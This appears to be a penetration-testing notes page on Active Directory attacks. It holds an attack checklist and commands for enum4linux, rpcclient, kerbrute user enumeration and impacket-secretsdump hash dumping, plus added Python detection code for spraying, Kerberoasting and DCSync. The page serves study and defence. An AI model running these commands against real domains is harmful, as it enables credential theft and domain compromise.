# Active Directory

## Attack Workflow

Determine what ports are open

Enumerate with:

* [ ] Determine open ports
  * [ ] Scan ports with Nmap to fingerprint
* [ ] Enumerate AD information
  * [ ] Domain info
  * [ ] rpcclient
  * [ ] enum4linux
* [ ] Get list of users
  * [ ] If list not available, bruteforce usernames
  * [ ] Determine whether Kerberos pre-authentication is disabled for any accounts
  * [ ] Determine which users have SPNs (Service Principal Names)

## enum4linux

Used to enumerate a large amount of AD information (users, groups, shares, password policy) from the command line.

```bash
enum4linux -a 10.1.1.10        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10    # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10        # Attempt to gather SMB shares
```

## rpcclient

Used to enumerate information about a system over MS-RPC.

Gather a list of domain accounts with `rpcclient` and save the usernames to a file:

```bash
# enumdomusers prints lines like "user:[Administrator] rid:[0x1f4]"; the awk pipeline keeps only the name between the first [ ]
rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt
```

## Password Spraying

A tool such as Talon can run password-spray attacks (one or two common passwords tried against many accounts) across an AD environment.

## Kerberos

Kerbrute is used to run various Kerberos attacks, such as enumerating valid usernames through pre-authentication responses. Written in Go. <https://github.com/ropnop/kerbrute>

```bash
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
```

## Kerberoasting

Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack offline. We must find all accounts in AD which have an SPN (Service Principal Name), then request RC4-encrypted service tickets (TGS) for them from the DC.
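The password spraying, Kerbrute user enumeration and Kerberoasting sections above all leave a footprint in the Domain Controller's Security log, so they can be covered by one piece of detection logic. The following is an added example, not code from the original page or from any of the tools it mentions. It runs over constructed sample events whose field names follow the Windows event schema (`TargetUserName`, `IpAddress`, `Status`, `TicketEncryptionType`, `ServiceName`); the thresholds, IP addresses and account names are assumptions chosen for the sample data.

```python
"""Kerberos event triage for a Domain Controller's Security log.

Added example (not from the original page). Three detections, each keyed on
events the DC already records:
  - 4768 with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for many distinct
    usernames from one source  -> username enumeration (kerbrute userenum style)
  - 4771 with status 0x18 (KDC_ERR_PREAUTH_FAILED) across many distinct
    accounts from one source   -> password spray
  - 4769 service-ticket requests with RC4 (0x17) for many distinct SPNs by
    one account                -> Kerberoasting
"""
from collections import defaultdict

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"
KDC_ERR_PREAUTH_FAILED = "0x18"
RC4_HMAC = "0x17"           # TicketEncryptionType for RC4-HMAC
AES256_CTS_HMAC_SHA1 = "0x12"

# Constructed sample events (not real telemetry). Each dict mimics the
# EventData fields of one DC Security-log record.
EVENTS = [
    # username enumeration: one source asks for TGTs for many non-existent users
    *({"EventID": 4768, "TargetUserName": f"ghost{i}", "IpAddress": "10.0.0.50",
       "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN} for i in range(12)),
    # password spray: one pre-auth failure per account, all from one source
    *({"EventID": 4771, "TargetUserName": f"user{i}", "IpAddress": "10.0.0.51",
       "Status": KDC_ERR_PREAUTH_FAILED} for i in range(15)),
    # Kerberoasting: one account requests RC4 service tickets for many SPNs
    *({"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": f"svc{i}",
       "IpAddress": "10.0.0.52", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"}
      for i in range(8)),
    # benign: an AES ticket for a single file server
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs",
     "IpAddress": "10.0.0.7", "TicketEncryptionType": AES256_CTS_HMAC_SHA1, "Status": "0x0"},
    # benign: one mistyped password
    {"EventID": 4771, "TargetUserName": "bob", "IpAddress": "10.0.0.8",
     "Status": KDC_ERR_PREAUTH_FAILED},
]


def detect_user_enumeration(events, threshold=10):
    """Sources that requested TGTs for >= threshold distinct non-existent users."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e.get("Status") == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(users) for ip, users in unknown.items() if len(users) >= threshold}


def detect_password_spray(events, threshold=10):
    """Sources with pre-auth failures against >= threshold distinct accounts."""
    failed = defaultdict(set)
    for e in events:
        if e["EventID"] == 4771 and e.get("Status") == KDC_ERR_PREAUTH_FAILED:
            failed[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(users) for ip, users in failed.items() if len(users) >= threshold}


def detect_kerberoasting(events, threshold=5):
    """Accounts that obtained RC4 service tickets for >= threshold distinct SPNs.

    krbtgt is skipped: a 4769 for krbtgt is a TGT renewal, not a service ticket
    for a roastable account.
    """
    rc4 = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4769 and e.get("Status") == "0x0"
                and e.get("TicketEncryptionType") == RC4_HMAC
                and e["ServiceName"].lower() != "krbtgt"):
            rc4[e["TargetUserName"].lower()].add(e["ServiceName"].lower())
    return {user: sorted(spns) for user, spns in rc4.items() if len(spns) >= threshold}


def triage(events):
    """Run all three detections and return their hits keyed by detection name."""
    return {
        "user_enumeration": detect_user_enumeration(events),
        "password_spray": detect_password_spray(events),
        "kerberoasting": detect_kerberoasting(events),
    }


if __name__ == "__main__":
    for name, hits in triage(EVENTS).items():
        print(f"{name}: {hits}")
```

Tune the thresholds per environment and evaluate them over a time window; legacy hosts can legitimately request RC4 tickets, so the Kerberoasting rule is strongest when paired with an allowlist and, as a mitigation, service accounts that use gMSA or long random passwords with AES-only encryption types.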

## secretsdump

Used to extract hashes from a server. The command below dumps the NTDS.dit contents (all domain account hashes) from the DC, assuming that you have an account with the necessary permissions.

```bash
impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154
```
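The `-just-dc` option above pulls secrets through the directory replication service rather than copying the file, which a Domain Controller records as event 4662 whose `Properties` list the control-access rights DS-Replication-Get-Changes (`1131f6aa-9c07-11d1-f79f-00c04fc2dcd2`) and DS-Replication-Get-Changes-All (`1131f6ad-9c07-11d1-f79f-00c04fc2dcd2`). Normal replication is performed by DC computer accounts, so any other principal exercising those rights is the signal. The following detection is an added example, not code from the original page or from Impacket; the event records, the `backup` subject and the allowlist of expected replicators are constructed for the sample.

```python
"""DCSync-style replication detection over constructed 4662 events.

Added example (not from the original page). Flags a 4662 event when the
Properties field carries a directory-replication control-access right and
the subject is not a known replicator (DC computer accounts or a directory
sync service account).
"""
import re

DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# 4662 lists rights as brace-wrapped GUIDs, one per line, under "Control Access"
GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12})\}")

# Constructed allowlist (assumption): the domain's DC computer accounts plus a
# hypothetical directory-sync service account that legitimately replicates.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "svc-dirsync"}

# Constructed sample events mimicking the EventData fields of 4662 records.
EVENTS = [
    # DC-to-DC replication: expected
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a user account pulling all replication data: suspicious
    {"EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "Control Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an unrelated 4662 (read of a different property): ignored
    {"EventID": 4662, "SubjectUserName": "alice", "SubjectDomainName": "CORP",
     "AccessMask": "0x10",
     "Properties": "Read Property\n\t\t{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    # a different event id entirely: ignored
    {"EventID": 4624, "SubjectUserName": "backup", "SubjectDomainName": "CORP"},
]


def replication_rights_used(event):
    """Return the replication control-access rights named in a 4662 Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return guids & REPLICATION_RIGHTS


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Return one alert per 4662 in which a non-replicator used replication rights."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        rights = replication_rights_used(e)
        if not rights or e["SubjectUserName"] in expected:
            continue
        alerts.append({
            "account": f"{e['SubjectDomainName']}\\{e['SubjectUserName']}",
            "rights": sorted(rights),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(EVENTS):
        print(f"replication rights used by non-DC account {alert['account']}: {alert['rights']}")
```

This rule depends on object-access auditing (4662) being enabled on the Domain Controllers; as a preventive control, review the domain root's DACL so that only DC computer accounts and a deliberately chosen sync account hold the two replication rights.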

![AD Detailed Mind Map](https://15634114-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MUBcWDIntFMCfIaMka5%2Fuploads%2F7E3kA4T4bA6RbkRYL8sX%2Fpentest_ad_black.png?alt=media&token=636dffbf-b1ac-44a7-b39f-080122e114bc)

<https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg>
